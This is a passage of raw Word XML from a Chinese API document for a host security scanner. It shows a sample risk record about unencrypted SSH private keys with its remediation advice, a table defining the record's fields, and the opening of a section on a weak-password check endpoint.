      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT032016001411",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "SSH服务用户home目录中存在未加密私</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "severity": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "apps": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "SSH"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "desc": "默认情况下在用户的home目录中存储的未加密私</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>，一旦该服务器被入侵，则可能导致该私</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>泄露。私</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>是登录服务器的重要凭证，如果私</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>被攻击者利用，可通过私</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>进行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>登录认证获取系统权限，带来不可预知的高危风险。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>restartOpts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>publicDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2016-12-02 00:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "检查所有用户home目录下是否存在未加密私</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remedDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "删除对应的私</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>，若已经使用过该私</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>对应的公</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>进行登录，则应注意更换所有使用该公</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>的主机的密钥",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "refs": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "firstCheckTime":"2016-12-02 00:00:00"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74936954"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600"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5555"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3920DAB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63CA95C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="703A1359" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F0530DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0530B874" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A121BDB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C7438A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51AE877B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F905C97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="503CDDB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7DF8FCF6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33C375C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C8934BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66B94FBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E34E318" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2686E21A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="540D6346" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20A662A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A235B90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="297C7450" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>危险程度：0-信息；1-低危；2-中危；3-高危；4-危急</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3C5D5ED4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F9CCC66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D5A2D6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="678DE6FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49E39F26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>影响的应用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="34ED638D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="650BC5AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>desc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FAB75D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FD3589F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29FB9E1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68DA44FD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1210E7BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D967355" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FD35685" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69AB39EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>重启选项：0-未知；1-无需重启；；2-服务重启；3-系统重启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F1E52B2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18957C79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>publicDate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39D4EA46" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="382C61BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19AE4F21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发布时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="768B1F60" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="595748DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>checkInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="049303BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1702CE50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61B1A170" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>验证信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6B4A82E9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="523F8FF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>checkResult</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B832516" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2132B0D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30B6AE53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>验证结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6ED77CB4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="248D1FE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>remedDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="550DB31D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="099D4358" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="712D3858" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修复建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="483D57FF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BD80597" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>refs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="095B69F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12FD0917" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2048)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10528176" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>引用信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="065FE959" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74659A17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>firstCheckTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78D556FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B774B2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A8BF5C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>首次检测出该风险的时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2887B4F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="195" w:name="_Toc115166172"/>
      <w:bookmarkStart w:id="196" w:name="linuxwindows弱密码"/>
      <w:bookmarkEnd w:id="186"/>
      <w:bookmarkEnd w:id="194"/>
      <w:r>
        <w:t>Linux/Windows弱密码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w14:paraId="7935C243" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux和Windows弱密码的检测和查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6A8B70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="197" w:name="_Toc115166173"/>
      <w:bookmarkStart w:id="198" w:name="风险扫描-2"/>
      <w:r>
        <w:t>风险扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
    </w:p>
    <w:p w14:paraId="78740E57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求主机信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17572AD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0612A704" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakpwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149DE713"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BC669E" w14:paraId="4590766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8B6743C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
